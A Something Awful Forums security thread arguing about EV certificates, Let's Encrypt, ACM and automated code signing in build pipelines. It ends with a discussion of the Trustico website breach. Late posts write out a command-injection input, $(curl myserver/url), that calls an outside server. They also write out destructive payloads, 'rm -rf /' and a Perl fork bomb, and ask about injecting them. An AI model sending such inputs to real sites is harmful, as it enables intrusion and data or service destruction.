Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
 
  • Post
  • Reply
incoherent
Apr 24, 2004

01010100011010000111001
00110100101101100011011
000110010101110010

Wiggly Wayne DDS posted:

you should at least include their public meltdown over it https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/wxX4Yv0E3Mk

it is v standard to revoke a compromised private key, usually someone just submits a signed message as proof but it's great that the ceo was so enthusiastic about proving they had the keys in an easily accessible format

insane CEO posted:

though now DigiCert appears to be influenced by the Symantec management team...

Jesus loving christ. Just trying to wrap my head around the need for a massive 50k+ revocation.

Adbot
ADBOT LOVES YOU

RFC2324
Jun 7, 2012

http 418

Potato Salad posted:

Getting a signing cert from a public CA for your AD Enterprise root trust is relatively involved. You should be point, and ask your clients for info/verification as needed. Your clients may get it wrong and torch cash on a useless cert.

I'm assuming from context clues that you're wanting the root AD CS cert to be publicly recognizable. There's no particular reason to not just make a one-off 4096 root enterprise cert if none of this needs to be trusted externally.

Actually, looking at starting a small business hosting for technophobe business owners who don't want to do business with anyone they can't sit and have a beer with. The deal is basically that I would handle their internet presence for a monthly fee.

I don't want to run into a situation where someone is unhappy with my service but will have trouble moving to someone else, since a large part of the reason the market exists is shady web devs holding their online presence hostage so they keep getting paid to do nothing more than keep the site alive with no updates. Some of these people have been paying $200+ a month to people who haven't updated their sites in years.

Daman
Oct 28, 2011

EssOEss posted:

Oh, I see what you mean - it is the equivalent of the lock icon on the address bar that tells you the website is trustworthy, right? That makes a lot of sense. Code signing says the exe is known good, just like seeing the lock icon means it is safe to enter my passwords onto that website.

ya you're being sarcastic but actually yes, the green lock happening when you go on google.com means they absolutely trust everything that's getting sent to your browser.

just like when you do code signing, you have to absolutely put your company's name behind that signed binary being your product.

consumers don't care about fuckups, sure, but you're a lovely company if you don't try to avoid fuckups.

Docjowles
Apr 9, 2009

RFC2324 posted:

Question about this. If I am doing hosting for extremely non-technical people who still own the domain themselves, what steps would need to be taken to get a CA to issue a cert to me in their name?

I don't want to own any of this poo poo so that divesting myself of it is easier, just hand over the keys to the business owners/their new tech people.

If by "hosting" you mean web hosting, it's trivial. Unless they want an EV cert, which becomes a pain in the rear end of having to provide physical legal documents and be able to accept phone calls from the registrar at random times of day and poo poo. Compare what your browser shows in the URL bar for this dumbass forum vs PayPal.com.

For a low level green padlock in the browser cert, you just have to demonstrate control of the domain. This is usually done by creating some DNS TXT record with an arbitrary value specified by the registrar, or being able to upload a document containing some arbitrary content to the path they specify. If you can do that, you can get a cert issued for their domain. It won't be owned by or associated with you, personally, in any way.

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...
Wasn't there some user testing showing that users gave exactly zero fucks about EV and mostly didn't even know that it existed?

The Fool
Oct 16, 2003


I don’t have any links, but I’ve heard that in a few places.


People have been harping on the ‘s’ and the padlock so much, that most users don’t even notice the EV or understand what it means.

Volguus
Mar 3, 2009

The Fool posted:

I don’t have any links, but I’ve heard that in a few places.


People have been harping on the ‘s’ and the padlock so much, that most users don’t even notice the EV or understand what it means.

A former boss of mine complained to me that the latest website that I launched for the company only had a green lock in the address bar, didn't show the company name like it does with PayPal. I showed him how much that would cost and what is involved ... the green lock only is fine.

apseudonym
Feb 25, 2011

Volmarias posted:

Wasn't there some user testing showing that users gave exactly zero fucks about EV and mostly didn't even know that it existed?

EV provides no additional security, it's just a way to charge customers more for certs.

RFC2324
Jun 7, 2012

http 418

Docjowles posted:

If by "hosting" you mean web hosting, it's trivial. Unless they want an EV cert, which becomes a pain in the rear end of having to provide physical legal documents and be able to accept phone calls from the registrar at random times of day and poo poo. Compare what your browser shows in the URL bar for this dumbass forum vs PayPal.com.

For a low level green padlock in the browser cert, you just have to demonstrate control of the domain. This is usually done by creating some DNS TXT record with an arbitrary value specified by the registrar, or being able to upload a document containing some arbitrary content to the path they specify. If you can do that, you can get a cert issued for their domain. It won't be owned by or associated with you, personally, in any way.

I don't need EV, I just think everything should be https, so thats cool. Next step is to figure out how to setup lets encrypt on AWS for the people I can't convince to buy a long term cert.

The Fool
Oct 16, 2003


apseudonym posted:

EV provides no additional security, it's just a way to charge customers more for certs.

An EV provides an extra layer of proof that you are who you say you are. It should theoretically make it harder for playpal.com to spoof PayPal.com



But as mentioned no-one pays attention to EV tags.

Space Gopher
Jul 31, 2006

BLITHERING IDIOT AND HARDCORE DURIAN APOLOGIST. LET ME TELL YOU WHY THIS SHIT DON'T STINK EVEN THOUGH WE ALL KNOW IT DOES BECAUSE I'M SUPER CULTURED.

bitprophet posted:

Do you mean specifically hardening the Jenkins servers/services themselves, or securing the overall workflow? Your 2nd comment implies you're at least thinking about the latter, in which case you should take a look at secrets management systems like Vault. Having a tool in charge of distributing & rotating secrets, and enforcing that they are on short-lived leases, is a big step up from "meh I just dropped my, or a similarly long-lived, AWS API secret into Jenkins' config, now an attacker gets to be god forever if they break in". Instead, they only get to be god for, say, 15 minutes, or an hour, instead of retaining those privileges for weeks/months until they're ready to leverage them.

Related, it doesn't require use of a secrets store (tho they often make the process easier) but another relatively low hanging fruit option is to follow principle of least privilege and only give Jenkins API keys that do exactly and only what it really needs to do.

You may think "ugh, my deployment needs instance creation, listing, modification and termination, plus all the same for volumes, plus most of that for AMIs, and ... being explicit is too much work, I'm just gonna give it a full admin role." Resisting that temptation and handing out only what you need, means that if Jenkins starts working for the enemy it doesn't have e.g. the ability to assign admin privileges to other users, or destroy backups, or etc. An attacker that can nuke instances is one thing, an attacker that can lock you out of the system or create a quietly unnoticed backdoor is much worse.

I'm talking about securing the overall workflow.

For most of the systems I'm talking about, they're native to one cloud platform provider or another, and they provide decent management infrastructure. For instance, in AWS, I don't bake creds into the system; it gets an IAM role and manages its own temporary credentials (with EC2 systems manager as a pretty decent secret store). And sure, I follow the principle of least privilege and enumerate everything the deployment automation can do - but a deployment automation system, by definition, is going to be able to affect everything I care about.

Jenkins or whatever other orchestration system might not be able to affect its own environment, but it's still going to be able to put code onto what I really care about : the application servers (or configs for "serverless" services, or whatever) that talk to the world, and whatever data stores they're using. The Jenkins environment going down, even if it's totally unrecoverable, isn't that bad an outcome. The real nightmare is somebody using production systems to serve coinhive.js or whatever malware to end users. I'm not in a PCI/HIPAA/whatever space right now, but obviously there are even worse outcomes when you're dealing with sensitive personal data.

Has anybody managed to actually crack this nut in a way that's manageable, lets application developers automate a decent chunk of their own infrastructure deployment (ideally with CFN/ARM/etc type templating), and doesn't give anybody with the ability to crack open an orchestration system godlike powers?

RFC2324 posted:

I don't need EV, I just think everything should be https, so thats cool. Next step is to figure out how to setup lets encrypt on AWS for the people I can't convince to buy a long term cert.

ACM certs are free and rotate themselves seamlessly. As long as you're OK with Amazon lock-in, terminating TLS at the load balancer, and never getting to touch the private key yourself, they are really, really good.

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

cheese-cube posted:

I might not be remembering this properly but I'm pretty sure those are screenshots anthonypants took around the time of the Sony Pictures breach when private keys for code-signing certs were found amongst the data released and anthonypants used them to sign an executable. The issue here is that the cert is issued by a trusted root CA so clients would have no issues with accepting it.
Someone found some Sony certs in the Sony dump, discovered that its password was the same as its filename, signed the malware executable that affected Sony, and uploaded it to VirusTotal.

apseudonym
Feb 25, 2011

The Fool posted:

An EV provides an extra layer of proof that you are who you say you are. It should theoretically make it harder for playpal.com to spoof PayPal.com



But as mentioned no-one pays attention to EV tags.

That major players don't bother with EV and that nothing technically gives a gently caress about it is pretty clear evidence.

Rufus Ping
Dec 27, 2006





I'm a Friend of Rodney Nano

RFC2324 posted:

Next step is to figure out how to setup lets encrypt on AWS

just use ACM

RFC2324 posted:

for the people I can't convince to buy a long term cert.

what is a "long term cert" and why would you use one over LE?

RFC2324
Jun 7, 2012

http 418

Rufus Ping posted:

just use ACM


what is a "long term cert" and why would you use one over LE?

Looking at acm now. I initially thought you could only use it with a route 53 registered dns, i see i was wrong.

And long term as in purchased for a year or 2 vs having to renew every month with LE. I know you can automate LE but it's still easier to just buy a traditional 1 year cert, especially when you are dealing with clients who tend to lag behind and distrust anything new.

It's gonna be a fascinating bit of work talking to these people, they have never even heard of the cloud.

The Fool
Oct 16, 2003


RFC2324 posted:

And long term as in purchased for a year or 2 vs having to renew every month with LE. I know you can automate LE but it's still easier to just buy a traditional 1 year cert, especially when you are dealing with clients who tend to lag behind and distrust anything new.

LE is better, get with the times.

EssOEss
Oct 23, 2006
128-bit approved

Daman posted:

ya you're being sarcastic but actually yes, the green lock happening when you go on google.com means they absolutely trust everything that's getting sent to your browser.

just like when you do code signing, you have to absolutely put your company's name behind that signed binary being your product.

consumers don't care about fuckups, sure, but you're a lovely company if you don't try to avoid fuckups.

I agree absolutely - digital signatures are there to prove who something came from. That's no the claim that was made in the above discussion, though, which was that having a digital signature means that software is "tested" or "validated" and implies something positive security-wise about it.

This is, however, absolute fantasy - just like a lock does not mean to the user that you can shove your password onto the website, signed code does not make it secure. What is trusted is the identity, not the fact that something is signed. You should not install drivers signed by Beanie Babies LLC just like you should not put any passwords into https://facebook.notascammer.ipromise.ru even if it has a pretty green lock.

Space Gopher
Jul 31, 2006

BLITHERING IDIOT AND HARDCORE DURIAN APOLOGIST. LET ME TELL YOU WHY THIS SHIT DON'T STINK EVEN THOUGH WE ALL KNOW IT DOES BECAUSE I'M SUPER CULTURED.

EssOEss posted:

I agree absolutely - digital signatures are there to prove who something came from. That's no the claim that was made in the above discussion, though, which was that having a digital signature means that software is "tested" or "validated" and implies something positive security-wise about it.

This is, however, absolute fantasy - just like a lock does not mean to the user that you can shove your password onto the website, signed code does not make it secure. What is trusted is the identity, not the fact that something is signed. You should not install drivers signed by Beanie Babies LLC just like you should not put any passwords into https://facebook.notascammer.ipromise.ru even if it has a pretty green lock.

What you're saying is that you plan to be untrustworthy, and your users should accept that.

The point of a signed binary release is that it says, "this is a legitimate piece of software put out by EssOEss; if you trust that person/company/OU, then you can trust this software."

What you want to do is turn that statement into, "this came from my automated build pipeline, gently caress if I know what's in there, but good luck."

The equivalent in a web context is Facebook allowing people to deploy random poo poo straight from source control to a public-facing server with a *.facebook.com cert and key.

Space Gopher fucked around with this message at 08:24 on Mar 1, 2018

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

EssOEss posted:

I agree absolutely - digital signatures are there to prove who something came from. That's no the claim that was made in the above discussion, though, which was that having a digital signature means that software is "tested" or "validated" and implies something positive security-wise about it.

This is, however, absolute fantasy - just like a lock does not mean to the user that you can shove your password onto the website, signed code does not make it secure. What is trusted is the identity, not the fact that something is signed. You should not install drivers signed by Beanie Babies LLC just like you should not put any passwords into https://facebook.notascammer.ipromise.ru even if it has a pretty green lock.
It sounds like what you want is a file hash. Code signing certificates is something else.

Jabor
Jul 16, 2010

#1 Loser at SpaceChem
Honest question, why do you actually want to have these builds signed?

Frivolous Sam
Apr 15, 2001

The aliens might be coming, THE ALIENS MIGHT BE COMING.

EssOEss posted:

I agree absolutely - digital signatures are there to prove who something came from. That's no the claim that was made in the above discussion, though, which was that having a digital signature means that software is "tested" or "validated" and implies something positive security-wise about it.

This is, however, absolute fantasy - just like a lock does not mean to the user that you can shove your password onto the website, signed code does not make it secure. What is trusted is the identity, not the fact that something is signed. You should not install drivers signed by Beanie Babies LLC just like you should not put any passwords into https://facebook.notascammer.ipromise.ru even if it has a pretty green lock.

You're right about the principles, but not their application.

The code signing only proves that it hasn't been changed since signing and who signed it.

However for that to be useful in the real world it matters whether the org who signed it is trustworthy.

Having proper processes so you know only good code gets signed by you makes you trustworthy. Otherwise everyone should be telling your users not to trust anything signed by you and what's the point of the certificate?

EssOEss
Oct 23, 2006
128-bit approved

Space Gopher posted:

The point of a signed binary release is that it says, "this is a legitimate piece of software put out by EssOEss; if you trust that person/company/OU, then you can trust this software."

I agree.

Space Gopher posted:

What you want to do is turn that statement into, "this came from my automated build pipeline, gently caress if I know what's in there, but good luck."

This seems to be an exaggeration. Of course I know and trust what is in there - why would I not? The mere fact that I do not want to implement some bothersome "user has to manually unlock signing key every 24 hours" process or some bureaucratic auditing scheme (that would become a pointless formality once the person doing it gets fed up) does not mean that my build pipeline is suddenly filled with malware.

I accept the risk that if that happens, it would be hard to notice fast enough, but that does not mean it is going to happen. Indeed, a large part of the reason I accept the risk is that the probability is almost infinitesimally low.

Space Gopher posted:

The equivalent in a web context is Facebook allowing people to deploy random poo poo straight from source control to a public-facing server with a *.facebook.com cert and key.

Yes, that seems to be more or less a fair analogy. Facebook's threat model is obviously very different, so as it is perhaps not a very useful parallel but I can see the similarity in principle.

Jabor posted:

Honest question, why do you actually want to have these builds signed?

Most importantly, app store requirements that require code signing.

Second, some of the signed code are PowerShell scripts and PowerShell in certain configurations requires scripts to be signed.Mostly people seem to just disable that requirement, but I try to do what I can to help people avoid disabling security features to get on with their job.

I also consider it general good practice to identify cryptographically who binaries originate from, so I would do it even without the above requirements if it were simple enough (which it mostly was, until GlobalSign announced they require some human action related to a token to actually do signing).

Frivolous Sam posted:

Having proper processes so you know only good code gets signed by you makes you trustworthy. Otherwise everyone should be telling your users not to trust anything signed by you and what's the point of the certificate?

Sure. However, proper processes can be "keep the system updated and do not allow random people Git commit access" and similar. They do not need to include overburdened auditing or "have to literally press button on USB token plugged into back of server" steps.

EssOEss fucked around with this message at 09:08 on Mar 1, 2018

SeaborneClink
Aug 27, 2010

MAWP... MAWP!

EssOEss posted:

Most importantly, app store requirements that require code signing.

Yep, they do, in fact.

EssOEss posted:


Second, some of the signed code are PowerShell scripts and PowerShell in certain configurations requires scripts to be signed.Mostly people seem to just disable that requirement, but I try to do what I can to help people avoid disabling security features to get on with their job.

I sure can't imagine a build pipeline in which you're both compiling code in Swift/Objective-C and PowerShell. Maybe you can shed some light on what unique scenario requires both binary and code signing.

EssOEss posted:

proper processes can be "[...] not allow random [...] Git commit access" and similar.

Almost like signing every test build with your public cert? Crazy...

Jabor
Jul 16, 2010

#1 Loser at SpaceChem

EssOEss posted:

I do not accept this definition. A signature says who the code came from, that is all. What is the logic here? If you draw other implications from this signature, your security model is a bit dubious

EssOEss posted:

Second, some of the signed code are PowerShell scripts and PowerShell in certain configurations requires scripts to be signed.Mostly people seem to just disable that requirement, but I try to do what I can to help people avoid disabling security features to get on with their job.

:thunk:

Wiggly Wayne DDS
Sep 11, 2010



that you're having trouble getting a cert in the first place should tell you that your understanding of risk is below the most bottom of the barrel reseller in the world

that you don't re-evaluate but instead double down that, actually, everyone else is wrong is why no one's going to ever take you seriously

if you ever get a code signing cert please keep us informed, it's good to know who to blacklist

SeaborneClink
Aug 27, 2010

MAWP... MAWP!

Wiggly Wayne DDS posted:

that you're having trouble getting a cert in the first place should tell you that your understanding of risk is below the most bottom of the barrel reseller in the world

that you don't re-evaluate but instead double down that, actually, everyone else is wrong is why no one's going to ever take you seriously

if you ever get a code signing cert please keep us informed, it's good to know who to blacklist

Mr. Trustico may be up for parts soon. Perhaps maybe we'll see Mr. EssOTrustiEss.

Hey pro-tip, don't email anyone the key you're signing your Jenkins based iOS or PowerShell builds with.

Potato Salad
Oct 23, 2014

nobody cares


SOS, can....you post a hash of your company's name? I don't want to see you outed for autosigning builds, I just want to make sure that I don't do business with your company.

Thanks Ants
May 21, 2004

#essereFerrari


https://twitter.com/svblxyz/status/969220402768736258

:tif:

The Fool
Oct 16, 2003


https://twitter.com/geofft/status/968937746214596610?s=21

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

https://twitter.com/cujanovic/status/969229397508153350

apseudonym
Feb 25, 2011


Don't touch the poop thread

Space Gopher
Jul 31, 2006

BLITHERING IDIOT AND HARDCORE DURIAN APOLOGIST. LET ME TELL YOU WHY THIS SHIT DON'T STINK EVEN THOUGH WE ALL KNOW IT DOES BECAUSE I'M SUPER CULTURED.

EssOEss posted:

I agree.


This seems to be an exaggeration. Of course I know and trust what is in there - why would I not? The mere fact that I do not want to implement some bothersome "user has to manually unlock signing key every 24 hours" process or some bureaucratic auditing scheme (that would become a pointless formality once the person doing it gets fed up) does not mean that my build pipeline is suddenly filled with malware.

I accept the risk that if that happens, it would be hard to notice fast enough, but that does not mean it is going to happen. Indeed, a large part of the reason I accept the risk is that the probability is almost infinitesimally low.

The point is to have a system that's resilient against compromise, at least a little bit.

Say I'm some evil malicious hacker who breaks into your build system from some faraway place. Maybe I'm the guy who owns https://facebook.notascammer.ipromise.ru. I know, you don't think it could ever happen, just like everybody else who's ever been compromised, but I've got control of your build system and a burning desire to steal your identity and compromise your users.

If you have automated code signing with the same cert you use for releases, that's it, I win. I can sign anything I please by pushing it to your build system. As far as the world knows, it's totally legit and you've signed off on it.

If you have automated code signing with an internal-only cert, and a separate system for signing release builds that puts a human in the loop to push a button, then my job gets a whole lot harder. I need to somehow socially engineer someone in your organization into pushing the "release" button when there's not actually a release, or wait and pray that you don't find the intrusion before your next release and whatever secret-ingredient scripting I've dropped into your pipeline works as expected the first time. Maybe I can still do that, but you get another significant chance to stop me before I get to what I want and you get your fifteen minutes of fame on security twitter and Ars Technica.

apseudonym posted:

Don't touch the poop thread

Somebody already did; trustico.com is 503ing.

e: according to the twitter thread it was executing the injected commands as root, too. jesus christ.

Space Gopher fucked around with this message at 16:52 on Mar 1, 2018

Farmer Crack-Ass
Jan 2, 2001

this is me posting irl

Space Gopher posted:

Say I'm some evil malicious hacker who breaks into your build system from some faraway place. Maybe I'm the guy who owns https://facebook.notascammer.ipromise.ru. I know, you don't think it could ever happen, just like everybody else who's ever been compromised, but I've got control of your build system and a burning desire to steal your identity and compromise your users.

He already covered this:

EssOEss posted:

No auditing - that would indeed be too much of a hassle. If someone infiltrated the system and got my build process to sign their malicious code, I doubt I would ever notice (maybe if Windows Defender catches it by coincidence during the signing process). I accept this risk.


EDIT: I'm curious, EssOEss, what does your company do?

Farmer Crack-Ass fucked around with this message at 17:33 on Mar 1, 2018

ChubbyThePhat
Dec 22, 2006

Who nico nico needs anyone else

Marvelous.

vanity slug
Jul 20, 2010

Farmer Crack-rear end posted:

EDIT: I'm curious, EssOEss, what does your company do?

Maybe they're an SSL Reseller.

Boris Galerkin
Dec 17, 2011

I don't understand why I can't harass people online. Seriously, somebody please explain why I shouldn't be allowed to stalk others on social media!

I don't get it. Can someone explain.

e: vvv Okay thanks. Yeah that does sound bad. vvv

e2: So like, is it possible, in theory of course, to just send it a `rm -rf /` command? Or hell,

perl -e "fork while fork" &

?

Boris Galerkin fucked around with this message at 20:26 on Mar 1, 2018

bitprophet
Jul 22, 2004
Taco Defender
First quoted Twitter user found that Trustico's website is executing untrusted user input in the shell (entering a "domain name" of $(curl myserver/url) results in that fella's myserver site getting curl'd).

Second quoted Twitter user piggybacks on that to prove, by updating the injected shell command to include the output of another subcommand (id, which spits out the running user's name and UID) that not only is Trustico executing untrusted user input...they're executing it as root.

All the facepalms.

EDIT: one more facepalm, courtesy of me using code instead of fixed

Stanley Pain
Jun 16, 2001

by Fluffdaddy
It's only freakin March. :gonk:

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
There's a lot of false things in this thread mixed in with the guesses

Adbot
ADBOT LOVES YOU

The Fool
Oct 16, 2003


anthonypants posted:

There's a lot of false things in this thread mixed in with the guesses

What's actually false? I thought it was a reasonable best-guess summary of the chain of events.

Although I suppose I should know better than to trust something retweeted by Taylor Swift

  • 1
  • 2
  • 3
  • 4
  • 5
  • Post
  • Reply